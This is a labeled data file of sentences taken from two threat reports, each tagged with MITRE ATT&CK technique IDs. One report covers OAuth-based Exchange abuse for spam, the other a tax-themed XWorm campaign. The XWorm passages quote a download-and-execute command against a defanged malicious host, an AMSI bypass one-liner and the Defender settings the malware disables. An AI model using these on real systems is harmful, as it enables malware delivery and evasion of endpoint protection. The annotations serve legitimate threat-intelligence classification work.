sentence
stringlengths
1
13.5k
labels
listlengths
0
15
doc_title
stringclasses
84 values
Each of these transport rules were responsible for deleting the following specific headers from every mail that flowed in the organization: X-MS-Exchange-ExternalOriginalInternetSenderX-MS-Exchange-SkipListedInternetSenderReceived-SPFReceivedARC-Authentication-ResultsARC-Message-SignatureDKIM-SignatureARC-SealX-MS-Exch...
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
The configuration information for the newly created transport rules were seen in Exchange audit event New-TransportRule.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
The following table shows the configuration parameters in the audit event related to this change: NameValue“Name”“Test06”“SenderAddressLocation”“Header”“RemoveHeader”“ARC-Message-Signature”These modifications to the Exchange server settings allowed the threat actor to perform their primary goal in the attack: sending o...
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
After each spam campaign, the actor deleted the malicious inbound connector and transport rules to prevent detection, while the application remained deployed in the tenant until the next wave of the attack (in some cases, the app was dormant for months before it was reused by the threat actor).
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
Figure 2.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
An example of the PowerShell script used for setting new Exchange connector and transport rulesSpam email campaign sent through Exchange connector The actor behind this attack has been actively running spam email campaigns for many years.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
Based on our research, this actor has sent high volumes of spam emails in short timeframes through other methods, such as connecting to mail servers from rogue IP addresses or sending directly from legitimate cloud-based bulk email sending infrastructure.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
The actor’s motive was to propagate deceptive sweepstakes spam emails designed to trick recipients into providing credit card details and signing up for recurring subscriptions under the guise of winning a valuable prize.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
While the scheme possibly led to unwanted charges for targets, there was no evidence of overt security threats such as credential phishing or malware distribution.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
The spam campaign carried the hallmarks of this actor: programmatically generated messages containing two visible hyperlinked images in the email body, as well as dynamic and randomized content injected within the HTML body of each mail message to evade spam filters. Figure 3.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
An example of spam email sent through the Exchange inbound connectorThe hyperlinked images within the spam messages implied to recipients that they were eligible for a prize.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
Once clicked, the hyperlink directed recipients to a website where they were asked to complete a survey and provide credit card details to pay for the shipping of their prize.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
Familiar brand logos, names, and websites were used throughout the spam email, likely to give an illusion of legitimacy.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
Figure 4.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
Clicking the image in the spam email leads to this website indicating a prize has been wonThe fine print, visible only by scrolling to the very bottom of a subsequent page, revealed that in providing their credit card information, recipients were not paying a shipping fee for their prize, but were in fact agreeing to b...
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
It is likely the threat actor’s main motive was potential financial gain from people who fell victim to this deceptive sweepstakes spam campaign.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
Figure 5.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
The fine print shows the chance to win a prize is only through a sweepstakes after paying feesLikely to achieve scale and further maximize the chances of successful email delivery, the actor triggered this spam campaign from cloud-based outbound email infrastructure outside of Microsoft, mainly Amazon SES and Mail Chim...
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
These email platforms enable sending of mass bulk email, normally for marketing and other legitimate purposes.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
The campaign also utilized techniques to generate unique dynamic URLs underpinning the hyperlinked images within each spam email message, as shown in the examples below.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
Examples of dynamic URL generation (domain obfuscated)This spam campaign exclusively targeted consumer email accounts.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
In the case of spam messages sent to Microsoft-hosted consumer email accounts (outlook.com), the spam emails were moved into customers’ junk folders before they could be viewed and clicked.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
Mitigations While the follow-on spam campaign targets consumer email accounts, this attack targets enterprise tenants to use as infrastructure for this campaign.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
This attack thus exposes security weaknesses that could be used by other threat actors in attacks that could directly impact affected enterprises.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
As the main initial access vector of the attack was to obtain the admin’s credentials, we recommend organizations take the following steps to reduce their attack surface: Mitigate credential guessing attacks risks A key step in reducing the attack surface is securing the identity infrastructure.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
The most common initial access vector observed in this attack was account compromise through credential stuffing, and all the compromised administrator accounts did not have MFA enabled.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
Implementing security practices that strengthen account credentials such as enabling MFA raises the cost of an attack.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
Enable conditional access policies Conditional access policies are evaluated and enforced every time the user attempts to sign in.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
Organizations can protect themselves from attacks that leverage stolen credentials by enabling policies such as device compliance or trusted IP address requirements.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
Enable continuous access evaluation Continuous access evaluation (CAE) revokes access in real time when changes in user conditions trigger risks, such as when a user is terminated or moves to an untrusted location.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
Enable security defaults While some of the features mentioned above require paid subscriptions, the security defaults in Azure AD, which is mainly for organizations using the free tier of Azure Active Directory licensing, are sufficient to better protect the organizational identity platform, as they provide preconfigur...
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
Detections for related techniques Leveraging its cross-signal capabilities, Microsoft 365 Defender alerts customers using Microsoft Defender for Office 365, Microsoft Defender for Cloud Apps, Application governance add-on, and Azure Active Directory Identity Protection to detect the techniques covered in the attack thr...
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
Each product can provide a different aspect for protection to cover the techniques observed in this attack: Microsoft 365 Defender Suspicious email-sending pattern from new Exchange inbound connector – This alert is generated when a suspicious email-sending pattern originating from a new Exchange inbound connector is d...
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
This behavior might suggest that an attacker set a malicious inbound connector to allow anonymous relay through the organization’s Exchange server.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
Recommended reading to response for malicious connector incidents: New transport rule removing antispam header –
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
This alert is generated when a new transport rule to remove antispam header is detected.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
Suspicious inbound connector and transport rule created to remove sender email headers – This alert is generated when a suspicious inbound connector and transport rule is created to remove headers that identify the true source address of sender.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
This might indicate a spam campaign is ongoing from the organization’s mailbox.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
Suspicious Azure AD app creation – This alert is generated when a user account creates Azure Active Directory OAuth application with suspicious characteristics, as observed in this campaign.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
Azure AD app registration by risky user – This alert is generated when a user account with high risk score as calculated by AAD Identity Protection is creating a new OAuth application and grants admin consent to it.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
Microsoft Defender for Office 365 Microsoft Defender for Office 365 detects threat activity associated with this spamming campaign through the following email security alerts.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
Note, however, that these alerts may also be triggered by unrelated threat activity.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
We’re listing them here because we recommend that these alerts be investigated and remediated immediately.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
Email messages from a campaign removed after delivery​. This alert is generated when any messages associated with a campaign are delivered to mailboxes in an organization.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
Microsoft removes the infected messages from Exchange Online mailboxes using zero-hour auto purge (ZAP) if this event occurs.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
Microsoft Defender for Cloud Apps Activity from suspicious IP addresses.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
This alert is generated when there is activity from an IP address that has been identified as risky by Microsoft Threat Intelligence or by the organization.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
These IP addresses were identified as being involved in malicious activities, such as performing password spray, botnet C2, and may indicate a compromised account.
[ "T1110" ]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
Activity from a password-spray associated IP address.
[ "T1110" ]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
This alert is generated when a successful sign-in from an IP address that had been identified as participating in password spray was observed.
[ "T1110" ]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
App governance App governance is an add-on to Microsoft Defender for Cloud Apps, which can detect malicious OAuth applications that make sensitive Exchange Administrative activities along with other threat detection alerts.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
Activity related to this campaign will trigger the following alert: OAuth app with suspicious metadata has Exchange permission​. This alert is generated when a line of business OAuth app with suspicious metadata has privilege to manage permission over Exchange, which can lead an OAuth App to perform data collection or ...
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
Azure AD Identity Protection Azure AD Identity Protection automatically detects and remediates identity-based risks.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
It detects suspicious sign-in attempts and raises any of the following alerts: Anomalous Token.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
This alert flags a token’s unusual characteristics, such as its token lifetime or played from an unfamiliar location.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
Unfamiliar sign-in properties.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
In this phishing campaign, the attackers used multiple proxies or VPNs originating from various countries or regions unfamiliar to the target user.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
This alert flags anomalies in the token claims, token age, and other authentication attributes.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
Anonymous IP address.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
This alert flag sign-in attempts from anonymous IP addresses (for example, Tor browser or anonymous VPN).Hunting queries To locate related activity, Microsoft 365 Defender customers can run the following advanced hunting queries: Applications given the “Exchange.ManageAsApp” permission: CloudAppEvents | where Timestamp...
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
" | where RawEventData.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
ResultStatus == "Success" | where RawEventData has "dc50a0fb-09a3-484d-be87-e023b12c6440" //Exchange.ManageAsApp
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
Role Id | project Timestamp, AccountObjectId,AccountDisplayName, AppId = RawEventData.ModifiedProperties[0].NewValue, AppName = RawEventData.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
ModifiedProperties[6].NewValue New transport rules that remove anti-spam headers from emails: CloudAppEvents | where ActionType == "New-TransportRule" | mvexpand Param = RawEventData.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
Parameters | where Param.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
Name == "RemoveHeader" and Param.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
Value contains "X-MS-Exchange-AntiSpam-MessageData" | project Timestamp, AccountObjectId, AccountDisplayName, ServicePrincipalId = tostring(RawEventData.
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
AppId)
[]
Malicious OAuth applications used to compromise email servers and spread spam Microsoft Security Blog
Affected Platforms: WindowsImpacted Users: Windows usersImpact: Compromised machines are under the control of the threat actor, potentially resulting in stolen personally identifiable information (PII), credential theft, financial loss, etc.Severity Level:
[]
Deja Vu All Over Again Tax Scammers at Large
Medium The time has come again for tax returns—and tax-based scams.
[]
Deja Vu All Over Again Tax Scammers at Large
Targeting calendar-based events enables threat actors to prepare ahead of time and have a new selection of targets on rotation.
[]
Deja Vu All Over Again Tax Scammers at Large
This blog covers a few examples of malware that take advantage of tax season.
[]
Deja Vu All Over Again Tax Scammers at Large
Although such attacks may seem repetitive to the casual observer, threat actors would not continue to target taxpayers if previous attacks had not been successful.
[]
Deja Vu All Over Again Tax Scammers at Large
XWorm Delivered Through Tax Scam FortiGuard Labs became aware of a curious-looking archive file hosted on an open directory on www[.]farmaciasmv[.]com/citrix/2022%20tax_documents[.]zip, which has since been removed.
[]
Deja Vu All Over Again Tax Scammers at Large
Empty open directory that hosted 2022%20tax_documents[.]zip
[]
Deja Vu All Over Again Tax Scammers at Large
The zip file contains the following files: Annual Withdrawal.xlsx (SHA2: 59bb292565ebc86800e5e4d625d3c19f98afe2261d3da1a8e2f9b45ec76153a0) Robert tax_docs.pdf (SHA2: a9f4b054ea128529c62a8ff25f1439651f045e443adf5ff11fb5bd29f1333a7a) Figure 2.
[]
Deja Vu All Over Again Tax Scammers at Large
Contents of the 2022%20tax_documents[.]zip The XLSX file is a benign decoy file that contains financial data from an unknown source.
[]
Deja Vu All Over Again Tax Scammers at Large
Contents of the Annual Withdrawal.xlsx The other file is malicious.
[]
Deja Vu All Over Again Tax Scammers at Large
Despite Robert tax_docs.pdf having a PDF icon, it is different from what it seems.
[]
Deja Vu All Over Again Tax Scammers at Large
The file is actually a link (LNK) file that launches the legitimate script (C:\Windows\System32\SyncAppvPublishingServer.vbs), which has a known issue of taking command line arguments.
[ "T1059.003" ]
Deja Vu All Over Again Tax Scammers at Large
The link file exploits this issue and feeds the legitimate script with the following command line argument to download and execute a remote “note.hta”: ;\W_\*2\\\m_h_a_e ('http'+'://datacenter002[.]myftp[.]biz/documents/note.
[ "T1059.003", "T1105" ]
Deja Vu All Over Again Tax Scammers at Large
'+'hta')
[]
Deja Vu All Over Again Tax Scammers at Large
The downloaded note.hta uses PowerShell to download another remote file hosted on hxxp://datacenter002[.]myftp[.]biz/documents/note[.]gif, which was not available at the time of our investigation.
[ "T1105" ]
Deja Vu All Over Again Tax Scammers at Large
Finding another note.gif (SHA2: 0487ef401345aa17c6aaeac23151219863e1363f82fe76edd0066bbf3fb07715) based on the same infection chain let us continue our quest to the payload.
[]
Deja Vu All Over Again Tax Scammers at Large
note.gif is a PowerShell script that creates the following files: C:\Users\Public\onedrive.vbs (SHA2: 92C1767EE4A954B93D6AFA9AE83FE82B82D2867D919D0359DCF2C8DA75FB8C7C)
[]
Deja Vu All Over Again Tax Scammers at Large
C:\Users\Public\test.vbs (SHA2: ADBA59F1495965684EEB4C5DAAD67F732FEB5E9183AE05EB869E20C88CAD7327) C:\Users\Public\onedrive.ps1 (SHA2: 7A9705A424A634A321DB9F36B61D74B953A44D44EDC429F7641BF830870572FC) Once launched, it executes the onedrive.vbs and test.vbs files.
[]
Deja Vu All Over Again Tax Scammers at Large
test.vbs creates %usertemp%\Note.txt, a clean file containing fake "QUARTERLY TAX PAYMENTS FOR 2022" data. Figure 4.
[]
Deja Vu All Over Again Tax Scammers at Large
Note.txt containing fake “QUARTERLY TAX PAYMENTS FOR 2022” data onedrive.vbs runs the previously created onedrive.ps1 filled with activities designed to hamper Windows Defender.
[ "T1562.001" ]
Deja Vu All Over Again Tax Scammers at Large
It first executes the following known AMSI (Antimalware Scripting Interface) bypass:
[]
Deja Vu All Over Again Tax Scammers at Large
[Ref].Assembly.GetType(‘System.
[]
Deja Vu All Over Again Tax Scammers at Large
Management.
[]
Deja Vu All Over Again Tax Scammers at Large
Automation.
[]
Deja Vu All Over Again Tax Scammers at Large
AmsiUtils’)
[]
Deja Vu All Over Again Tax Scammers at Large
.GetField(‘amsiInitFailed’,’NonPublic,Static’).SetValue($null,$true) It also disables AMSI by hijacking the COM server, changing it from "%windir%\system32\amsi.dll" to "C:\IDontExist.dll".
[ "T1562.001" ]
Deja Vu All Over Again Tax Scammers at Large
The PowerShell script then performs the following actions to alter Windows Defender settings: Adds the following exclusions to Windows DefenderExtensions: .bat, .ppam, .xls, .docx, .bat, .exe, .vbs, .js
[ "T1562.001" ]
Deja Vu All Over Again Tax Scammers at Large
File paths: C:\, D:\, E:\ Processes: explorer.exe, kernel32.dll, aspnet_compiler.exe, cvtres.exe, CasPol.exe, csc.exe, Msbuild.exe, ilasm.exe, InstallUtil.exe, jsc.exe, Calc.exe, powershell.exe, rundll32.exe, conhost.exe, Cscript.exe, mshta.exe, cmd.exe, DefenderisasuckingAntivirus, wscript.exe Allows known Windows Def...
[ "T1562.001" ]
Deja Vu All Over Again Tax Scammers at Large
Realtime monitoring Script scanning Controlled folder access protection PUA protection Scheduled scan Sets Network Protection to audit mode in Windows Defender (allows users to visit known malicious sites but logs them in the event log)
[ "T1562.001" ]
Deja Vu All Over Again Tax Scammers at Large
Disables MAPS (Microsoft Active Protection Service) reporting Never submits samples to Microsoft Allows severe/high/moderate/low-level threats to execute Disables the "administrator in Admin Approval Mode" user type (disables UAC prompts) Stops the WinDefend service (Windows Defender) Disables the startup of the WinDef...
[ "T1055", "T1562.001" ]
Deja Vu All Over Again Tax Scammers at Large
Furthermore, we discovered other files that follow a similar attack pattern; “Mary tax docs.pdf.lnk” (SHA2: 6dee21d581eac2214e3ea7259bf9cb3e0cc31b442a372ffba00f82aa858050f0) and “Wilson tax_docs.pdf.lnk” (SHA2: c06cf72149d52b8a7c73b38c075156df4c458f633c3031c3c0ce32741ad1518e) that were used in March 2023.
[]
Deja Vu All Over Again Tax Scammers at Large
As with the attack mentioned previously, these link files are disguised as PDF files to fool potential victims into opening them.
[ "T1204.002" ]
Deja Vu All Over Again Tax Scammers at Large